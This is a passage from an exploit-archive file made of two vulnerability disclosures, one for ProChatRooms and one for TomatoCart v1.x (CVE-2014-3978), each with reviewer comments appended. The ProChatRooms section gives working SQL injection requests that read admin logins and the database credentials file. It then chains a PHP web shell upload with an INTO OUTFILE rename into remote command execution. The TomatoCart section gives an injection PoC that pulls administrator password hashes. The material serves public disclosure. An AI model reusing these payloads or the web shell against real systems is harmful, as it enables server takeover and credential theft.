POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="profileEmail"
mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#
The following SQL injection will retrieve the SQL connection string, which probably has clear-text database credentials.
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="profileEmail"
mm@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#
4) Arbitrary File Upload
==================
It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server.
The following request will upload a PHP web shell and the web application will return a 32 digit value.
POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream
<?php system($_GET[cmd]);?>
Response:
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">
Since the uploaded web shell is without extension it will not be executed:
http://<WEBSITE>/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45<http://%3cWEBSITE%3e/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45>
<?php system($_GET[cmd]);?>
Image:
[cid:image005.png@01CFB099.8E117F70]
However, exploiting the SQL injection it is possible to rename the file by appending a .php extension
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="profileEmail"
mm@1dn.eu' where id ='1'; SELECT load_file('/var/www/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45') INTO OUTFILE '/var/www/prochatrooms/profiles/uploads/s.php';#
Web shell:
http://<WEBSITE>/prochatrooms/profiles/uploads/s.php?cmd=id<http://%3cWEBSITE%3e/prochatrooms/profiles/uploads/s.php?cmd=id>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Image:
[cid:image006.png@01CFB099.8E117F70]
Timeline
========
19/07/2014: Vendor informed via email
04/08/2014: Vendor informed via email
05/08/2014: Public Disclosure
Kind regards,
Mike
______________________________________________________________________
Disclaimer: This e-mail and any attachments are confidential.
It may contain privileged information and is intended for the named
addressee(s) only. It must not be distributed without Dionach Ltd consent.
If you are not the intended recipient, please notify the sender immediately and destroy this e-mail.
Any unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd.
Dionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242
______________________________________________________________________
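Review bot: the file still carries e-mail export residue that should be stripped before archiving: every URL is followed by an Outlook-style duplicate in angle brackets ("<http://%3cWEBSITE%3e/prochatrooms/...>"), the two "Image:" lines point at "[cid:image005.png@01CFB099.8E117F70]" / "[cid:image006.png@01CFB099.8E117F70]" attachments that are not part of the submission, and the Dionach confidentiality disclaimer after "Kind regards, Mike" is signature boilerplate. Also fix "ProoChatRooms" in the SQL Injection section. On substance, the advisory would be stronger if it stated the fix: the first snippet (functions.php ~2437) builds a $params array for a parameterized query and then ignores it, concatenating $email and $id straight into the UPDATE string, so binding $params instead of interpolating (and doing the same at ~2449 and ~3110) closes all three injection points; makeSafe's htmlspecialchars is not a substitute, as the advisory itself notes.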

platforms/php/webapps/34308.txt Executable file
@ -0,0 +1,47 @@
Title:
TomatoCart v1.x (latest-stable) Remote SQL Injection Vulnerability
Background:
TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services. The current stable package is TomatoCart V1.1.8.6.1, while the latest development version is version 2.0 Alpha 4. This exploit affects the "stable" tree.
Timeline:
06 June 2014 - CVE-2014-3978 assigned
06 June 2014 - Submitted to vendor
25 June 2014 - Received inadequate patch from vendor
26 June 2014 - Suggested patch sent to vendor
17 July 2014 - Request for update from vendor, no response.
05 August 2014 - Pull request sent on github for full patch
Status:
Vendor ignored, see suggested fix below.
Released:
05 August 2014 - https://breaking.technology/advisories/CVE-2014-3978.txt
Classification:
SQL Injection
Exploit Complexity:
Low
Severity:
High
Description:
TomatoCart suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.
Required Information:
* Valid user account
PoC:
Create a new contact in your address book using the following values.
First name: :entry_lastname,
Last Name : ,(select user_name from toc_administrators order by id asc limit 1),(select user_password from toc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
The new contact will be added to your address book with the admin hash as the contact's street address
Suggested Action:
Pull request has been sent to the developers on github. Recommend patching the required to properly encode colon (:)
https://github.com/tomatocart/TomatoCart-v1/pull/238
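Review bot: the "Suggested Action" sentence is cut off ("Recommend patching the required to properly encode colon (:)") and the advisory never names the affected file or function, so a reader has to infer the mechanism from the PoC alone: the first name ":entry_lastname," is treated as a placeholder by the query factory and expanded with the raw last-name value, which is why the fix is to encode colons in bound values. Recommend stating that explicitly, naming the query factory method, and either citing the exact commit from pull request #238 or reproducing the patch so the file is self-contained; the "Background" paragraph is vendor marketing copy and could be trimmed to the affected version (1.1.8.6.1, stable tree).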